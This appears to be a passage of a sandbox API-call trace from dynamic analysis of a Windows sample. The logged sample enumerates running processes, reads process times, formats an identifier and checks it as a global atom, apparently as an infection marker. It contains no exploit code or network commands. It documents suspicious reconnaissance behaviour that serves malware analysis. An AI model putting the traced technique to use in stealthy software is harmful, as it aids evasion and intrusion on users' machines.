	[0126.349] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0126.349] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.350] CloseHandle (hObject=0x69c) returned 1
	[0126.350] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0126.350] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.350] CloseHandle (hObject=0x69c) returned 1
	[0126.350] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x399d248, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0126.350] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.350] CloseHandle (hObject=0x69c) returned 1
	[0126.350] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0126.351] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.351] CloseHandle (hObject=0x69c) returned 1
	[0126.351] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.354] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.354] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.355] CloseHandle (hObject=0x2dc) returned 1
	[0126.355] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0126.355] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.355] CloseHandle (hObject=0x2dc) returned 1
	[0126.355] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.355] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.355] CloseHandle (hObject=0x2dc) returned 1
	[0126.355] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x399d188, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0126.356] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.356] CloseHandle (hObject=0x2dc) returned 1
	[0126.356] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x69d578, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0126.356] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.356] CloseHandle (hObject=0x2dc) returned 1
	[0126.356] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x399d128, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0126.356] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.357] CloseHandle (hObject=0x2dc) returned 1
	[0126.357] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39b9708, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0126.357] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.357] CloseHandle (hObject=0x2dc) returned 1
	[0126.357] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x399d188, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0126.357] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.357] CloseHandle (hObject=0x2dc) returned 1
	[0126.358] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x39b5b80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0126.358] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.358] CloseHandle (hObject=0x2dc) returned 1
	[0126.358] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.358] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.358] CloseHandle (hObject=0x2dc) returned 1
	[0126.358] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0126.358] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.358] CloseHandle (hObject=0x2dc) returned 1
	[0126.359] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0126.359] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.359] CloseHandle (hObject=0x2dc) returned 1
	[0126.359] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x39b5b80, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0126.359] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.359] CloseHandle (hObject=0x2dc) returned 1
	[0126.359] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x39b5b80, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0126.360] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.360] CloseHandle (hObject=0x2dc) returned 1
	[0126.360] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39b9938, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0126.360] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.360] CloseHandle (hObject=0x2dc) returned 1
	[0126.360] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x39b5b50, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0126.360] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.360] CloseHandle (hObject=0x2dc) returned 1
	[0126.361] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x39b5a78, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0126.361] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.361] CloseHandle (hObject=0x2dc) returned 1
	[0126.361] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0126.361] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.361] CloseHandle (hObject=0x2dc) returned 1
	[0126.361] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x39b5b08, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0126.362] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.362] CloseHandle (hObject=0x2dc) returned 1
	[0126.362] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0126.362] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.362] CloseHandle (hObject=0x2dc) returned 1
	[0126.362] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39b97a8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0126.363] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.363] CloseHandle (hObject=0x2dc) returned 1
	[0126.363] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39b9af0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0126.363] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.363] CloseHandle (hObject=0x2dc) returned 1
	[0126.363] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0126.363] GetLastError () returned 0x5
	[0126.363] GetLastError () returned 0x5
	[0126.363] GetLastError () returned 0x5
	[0126.363] GetLastError () returned 0x5
	[0126.363] GetLastError () returned 0x5
	[0126.363] GetLastError () returned 0x5
	[0126.363] GetLastError () returned 0x5
	[0126.364] GetLastError () returned 0x5
	[0126.364] GetLastError () returned 0x5
	[0126.364] GetLastError () returned 0x5
	[0126.364] GetLastError () returned 0x5
	[0126.364] GetLastError () returned 0x5
	[0126.364] GetLastError () returned 0x5
	[0126.364] GetLastError () returned 0x5
	[0126.364] GetLastError () returned 0x5
	[0126.364] GetLastError () returned 0x5
	[0126.364] GetLastError () returned 0x5
	[0126.364] GetLastError () returned 0x5
	[0126.364] GetLastError () returned 0x5
	[0126.364] GetLastError () returned 0x5
	[0126.364] GetLastError () returned 0x5
	[0126.364] GetLastError () returned 0x5
	[0126.364] GetLastError () returned 0x5
	[0126.364] GetLastError () returned 0x5
	[0126.364] GetLastError () returned 0x5
	[0126.364] GetLastError () returned 0x5
	[0126.364] GetLastError () returned 0x5
	[0126.364] GetLastError () returned 0x5
	[0126.364] GetLastError () returned 0x5
	[0126.364] GetLastError () returned 0x5
	[0126.364] GetLastError () returned 0x5
	[0126.364] GetLastError () returned 0x5
	[0126.364] GetLastError () returned 0x5
	[0126.364] GetLastError () returned 0x5
	[0126.364] GetLastError () returned 0x5
	[0126.364] GetLastError () returned 0x5
	[0126.364] GetLastError () returned 0x5
	[0126.364] GetLastError () returned 0x5
	[0126.364] GetLastError () returned 0x5
	[0126.364] GetLastError () returned 0x5
	[0126.364] GetLastError () returned 0x5
	[0126.364] GetLastError () returned 0x5
	[0126.364] GetLastError () returned 0x5
	[0126.364] GetLastError () returned 0x5
	[0126.364] GetLastError () returned 0x5
	[0126.364] GetLastError () returned 0x5
	[0126.364] GetLastError () returned 0x5
	[0126.364] GetLastError () returned 0x5
	[0126.364] GetLastError () returned 0x5
	[0126.364] GetLastError () returned 0x5
	[0126.364] GetLastError () returned 0x5
	[0126.364] GetLastError () returned 0x5
	[0126.364] GetLastError () returned 0x5
	[0126.364] GetLastError () returned 0x5
	[0126.364] GetLastError () returned 0x5
	[0126.365] GetLastError () returned 0x5
	[0126.365] GetLastError () returned 0x5
	[0126.365] GetLastError () returned 0x5
	[0126.365] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0126.365] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0126.365] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0126.365] GetLastError () returned 0x5
	[0126.365] GetLastError () returned 0x5
	[0126.365] GetLastError () returned 0x5
	[0126.365] GetLastError () returned 0x5
	[0126.365] GetLastError () returned 0x5
	[0126.365] GetLastError () returned 0x5
	[0126.365] GetLastError () returned 0x5
	[0126.365] GetLastError () returned 0x5
	[0126.365] GetLastError () returned 0x5
	[0126.365] GetLastError () returned 0x5
	[0126.365] GetLastError () returned 0x5
	[0126.365] GetLastError () returned 0x5
	[0126.365] GetLastError () returned 0x5
	[0126.365] GetLastError () returned 0x5
	[0126.365] GetLastError () returned 0x5
	[0126.365] GetLastError () returned 0x5
	[0126.365] GetLastError () returned 0x5
	[0126.365] GetLastError () returned 0x5
	[0126.365] GetLastError () returned 0x5
	[0126.365] GetLastError () returned 0x5
	[0126.365] GetLastError () returned 0x5
	[0126.366] GetLastError () returned 0x5
	[0126.366] GetLastError () returned 0x5
	[0126.366] GetLastError () returned 0x5
	[0126.366] GetLastError () returned 0x5
	[0126.366] GetLastError () returned 0x5
	[0126.366] wsprintfA (in: param_1=0x39938f8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0126.366] GetLastError () returned 0x5
	[0126.366] GetLastError () returned 0x5
	[0126.366] GetLastError () returned 0x5
	[0126.366] GetLastError () returned 0x5
	[0126.366] GetLastError () returned 0x5
	[0126.366] GetLastError () returned 0x5
	[0126.366] GetLastError () returned 0x5
	[0126.366] GetLastError () returned 0x5
	[0126.366] GetLastError () returned 0x5
	[0126.366] GetLastError () returned 0x5
	[0126.366] GetLastError () returned 0x5
	[0126.366] GetLastError () returned 0x5
	[0126.366] GetLastError () returned 0x5
	[0126.366] GetLastError () returned 0x5
	[0126.366] GetLastError () returned 0x5
	[0126.366] GetLastError () returned 0x5
	[0126.366] GetLastError () returned 0x5
	[0126.366] GetLastError () returned 0x5
	[0126.366] GetLastError () returned 0x5
	[0126.366] GetLastError () returned 0x5
	[0126.366] GetLastError () returned 0x5
	[0126.366] GetLastError () returned 0x5
	[0126.366] GetLastError () returned 0x5
	[0126.366] GetLastError () returned 0x5
	[0126.366] GetLastError () returned 0x5
	[0126.366] GetLastError () returned 0x5
	[0126.366] GetLastError () returned 0x5
	[0126.366] GetLastError () returned 0x5
	[0126.366] GetLastError () returned 0x5
	[0126.366] GetLastError () returned 0x5
	[0126.366] GetLastError () returned 0x5
	[0126.366] GetLastError () returned 0x5
	[0126.366] GetLastError () returned 0x5
	[0126.366] GetLastError () returned 0x5
	[0126.366] GetLastError () returned 0x5
	[0126.366] GetLastError () returned 0x5
	[0126.367] GetLastError () returned 0x5
	[0126.367] GetLastError () returned 0x5
	[0126.367] GetLastError () returned 0x5
	[0126.367] GetLastError () returned 0x5
	[0126.367] GetLastError () returned 0x5
	[0126.367] GetLastError () returned 0x5
	[0126.367] GetLastError () returned 0x5
	[0126.367] GetLastError () returned 0x5
	[0126.367] GetLastError () returned 0x5
	[0126.367] GetLastError () returned 0x5
	[0126.367] GetLastError () returned 0x5
	[0126.367] GetLastError () returned 0x5
	[0126.367] GetLastError () returned 0x5
	[0126.367] GetLastError () returned 0x5
	[0126.367] GetLastError () returned 0x5
	[0126.367] GetLastError () returned 0x5
	[0126.367] GetLastError () returned 0x5
	[0126.367] GetLastError () returned 0x5
	[0126.367] GetLastError () returned 0x5
	[0126.367] GetLastError () returned 0x5
	[0126.367] GetLastError () returned 0x5
	[0126.367] GetLastError () returned 0x5
	[0126.367] GetLastError () returned 0x5
	[0126.367] GetLastError () returned 0x5
	[0126.367] GetLastError () returned 0x5
	[0126.367] GetLastError () returned 0x5
	[0126.367] GetLastError () returned 0x5
	[0126.367] GetLastError () returned 0x5
	[0126.367] GetLastError () returned 0x5
	[0126.367] GetLastError () returned 0x5
	[0126.367] GetLastError () returned 0x5
	[0126.367] GetLastError () returned 0x5
	[0126.367] GetLastError () returned 0x5
	[0126.367] GetLastError () returned 0x5
	[0126.367] GetLastError () returned 0x5
	[0126.367] GetLastError () returned 0x5
	[0126.367] GetLastError () returned 0x5
	[0126.367] GetLastError () returned 0x5
	[0126.367] GetLastError () returned 0x5
	[0126.367] GetLastError () returned 0x5
	[0126.367] GetLastError () returned 0x5
	[0126.367] GetLastError () returned 0x5
	[0126.367] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0126.368] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0126.368] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0126.368] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0126.368] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0126.368] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0126.368] CloseHandle (hObject=0x2dc) returned 1
	[0126.368] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0126.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x39b59e8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0126.369] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.369] CloseHandle (hObject=0x2dc) returned 1
	[0126.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x69d5d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0126.369] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.369] CloseHandle (hObject=0x2dc) returned 1
	[0126.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x39b5970, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0126.370] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.370] CloseHandle (hObject=0x2dc) returned 1
	[0126.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="conhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.370] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.370] CloseHandle (hObject=0x2dc) returned 1
	[0126.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PING.EXE", cchWideChar=8, lpMultiByteStr=0x39b5a78, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PING.EXE", lpUsedDefaultChar=0x0) returned 8
	[0126.370] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.370] CloseHandle (hObject=0x2dc) returned 1
	[0126.371] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0126.411] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x39b5c10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0126.411] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b59e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0126.412] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.412] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b59e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0126.412] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x39b5b38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0126.412] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x39b5b80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0126.412] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x39b5b08, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0126.413] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.413] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.413] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x69d578, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0126.413] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.413] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.414] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.414] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.414] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
